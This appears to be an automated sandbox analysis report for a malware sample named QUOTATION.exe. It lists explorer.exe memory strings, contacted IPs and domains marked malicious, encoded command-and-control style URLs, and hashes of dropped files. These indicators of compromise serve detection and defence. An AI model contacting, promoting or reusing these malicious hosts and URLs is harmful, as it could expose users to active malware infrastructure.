Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.4198190622.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.7993734219.0000000000D30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.4217880966.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000D0A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndL
Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.7998474885.0000000001530000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

IP	Domain	Country	ASN	ASN Name	Malicious
91.184.0.24	www.b-tek.media	Netherlands	197902	HOSTNETNL	true
45.194.145.38	www.buymyenergy.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
199.192.26.35	www.dexmart.xyz	United States	22612	NAMECHEAP-NETUS	true
217.160.0.217	www.solya-shop.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
45.56.79.23	www.cardinialethanol.com	United States	63949	LINODE-APLinodeLLCUS	true
154.215.156.6	bb.zhanghonghong.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
34.117.168.233	td-ccm-168-233.wixdns.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
104.21.45.96	www.maxhaidt.com	United States	13335	CLOUDFLARENETUS	true
81.17.18.196	www.brightfms.com	Switzerland	51852	PLI-ASCH	true
23.83.160.9	www.aznqmd.com	United States	7203	LEASEWEB-USA-SFO-12US	true
162.240.73.101	www.wittofitentertainment.com	United States	46606	UNIFIEDLAYER-AS-1US	false
208.91.197.91	www.funvacayflorida.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
81.17.29.148	www.texasgent.com	Switzerland	51852	PLI-ASCH	true
88.212.206.251	www.interactive-media.ru	Russian Federation	39134	UNITEDNETRU	true
2.57.90.16	eta-trader.net	Lithuania	47583	AS-HOSTINGERLT	true

Name	Malicious	Antivirus Detection	Reputation
http://www.solya-shop.com/d91r/	true	Avira URL Cloud: safe	unknown
http://www.dexmart.xyz/d91r/	true	Avira URL Cloud: safe	unknown
http://www.184411.com/d91r/	true	Avira URL Cloud: safe	unknown
http://www.b-tek.media/d91r/	true	Avira URL Cloud: safe	unknown
http://www.dexmart.xyz/d91r/?pO=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&8H7gL=Bxcfm_qbbEGm	true	Avira URL Cloud: safe	unknown
http://www.interactive-media.ru/d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm	true	Avira URL Cloud: safe	unknown
http://www.ghostdyes.net/d91r/	true	Avira URL Cloud: safe	unknown
http://www.funvacayflorida.com/d91r/	true	Avira URL Cloud: safe	unknown
http://www.solya-shop.com/d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm	true	Avira URL Cloud: safe	unknown
http://www.texasgent.com/d91r/	true	Avira URL Cloud: safe	unknown
http://www.brightfms.com/d91r/?pO=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&8H7gL=Bxcfm_qbbEGm	true	Avira URL Cloud: safe	unknown
http://www.cardinialethanol.com/d91r/	true	Avira URL Cloud: safe	unknown
http://www.aznqmd.com/d91r/?pO=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&8H7gL=Bxcfm_qbbEGm	true	Avira URL Cloud: safe	unknown
http://www.texasgent.com/d91r/?pO=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&8H7gL=Bxcfm_qbbEGm	true	Avira URL Cloud: safe	unknown
http://www.cardinialethanol.com/d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm	true	Avira URL Cloud: safe	unknown
http://www.flaviosilva.online/d91r/	true	Avira URL Cloud: safe	unknown

ID:	830630
Product:	CloudBasic
Start time:	15:14:59
Start date:	20.03.2023
Sample:	QUOTATION.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	9f23ccacd955392c62b1b5d4be4ed690
SHA1:	d7c9c869add707b5b41a1f11f5c82bba94eabbd7
SHA256:	7b8d50ac67b2f0de5e35909025cc1a8d15f5edd18675878c7aaa31e3fe83a9fd
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Alswith\Peroxidisement\Foresprges87\SolutionExplorerCLI.dll	PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3A03B61FA01DCDFF3E595D279F159D6E	94900C28C23AD01D311C389A0813277CFB30345C	4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Industrialization\Snoldets\Embrocates\Utaalmodiges.Taa169	data	F4CC23ED0D3896E2B178E6A55C40AA4E	370ACD45CAAE23C832BD48E3CC3D56C1107E3A51	F70AA179CC5D44B7605AC33C35BA47DC32A5DA0EFE494AB7C5CF132AEF6ACA0C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\libpkcs11-helper-1.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	2455841538BA8A502398C18781CC3CEB	86CFD513FEE46EBC2C35225B27372679BE6ADA91	F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\maintenanceservice2.exe	PE32+ executable (GUI) x86-64, for MS Windows	49A2E97304EF8E044EEBD7ACCAD37E11	7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A	83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\percentile.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	3144FDFEC817D0AC6FE3F4642B70328B	756C3513DC10CF00B517C72B2D3AB3E20895A46C	BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\Dampning.Dub	ASCII text, with very long lines (65536), with no line terminators	992929F1D7A90F5CE4FCCD117E1A7DBE	44CCBD5EBFE22ACECEFBF0CF381F99CD6015943B	BBA853900D50A7D6952063FAD68F534B5CB97B336B1B129F2F0717669BCF309A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.Security.Cryptography.X509Certificates.dll	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows	84D7B1FB924AEEFCF4A2C7A687FE2EF1	A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B	32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	BCC32F5B608C99F89508921B6333B329	5F70BB4A3A812C399D8D2A2954C9A715574CFF61	5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\libdatrie-1.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	8A54723090530190EB11AFCD5B702B1B	DFA923EC796A754BD21C4F9E504305848A4CB1B2	738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
C:\Users\user\AppData\Local\Temp\4995H5Jfc	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5	D331C900DDE8ACB523C51D9448205C0A	BDB3366F54876E78F76A6244EDA7A4C302FEB91D	F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
C:\Users\user\AppData\Local\Temp\nsg9F21.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0063D48AFE5A0CDC02833145667B6641	E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8	AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7

Windows Analysis Report QUOTATION.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
QUOTATION.exe